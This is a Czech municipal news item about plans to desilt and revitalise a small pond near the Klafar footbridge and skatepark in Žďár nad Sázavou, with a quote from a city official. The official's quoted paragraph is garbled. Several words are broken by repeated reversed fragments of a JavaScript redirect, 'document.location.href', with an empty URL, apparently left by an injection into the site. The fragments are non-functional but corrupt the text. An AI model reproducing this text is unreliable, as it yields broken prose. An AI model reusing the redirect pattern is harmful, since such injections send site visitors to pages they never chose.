Rainbow page separator

Rybníček pod silnicí protínající čtvrť Klafar čeká odbahnění

Pátek, 16. července 2021

Žďár nad Sázavou / Malý rybníček, řadu let zarůstající rákosím a aktuálně vypuštěný, který se nachází pod silnicí nedaleko skateparku, se dočká revitalizace. Ze dna vodní plochy, kolem níž po loňské výstavbě lávky pro cyklisty a pěší vedoucí do čtvrti Klafar projde podstatně více lidí než v předchozích letech, budou rovněž odstraněny nánosy bahna.
„V le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce počítáme s odbahněním nádrže. Aktuálně odbor komunálních služeb jedná s firmami o možných podmínkách provedení potřebných prací. Přípravné činnosti již byly zahájeny,“ uvedl Jiří Hemza z odboru strategického rozvoje a investic žďárského městského úřadu. Už v květnu byly prořezány nále[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové dřeviny ros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toucí kolem nádrže a odstraněny byly také větve a některé další pozůstatky, již v lokalitě zůstaly po stavbě lávky přes řeku Sázavu.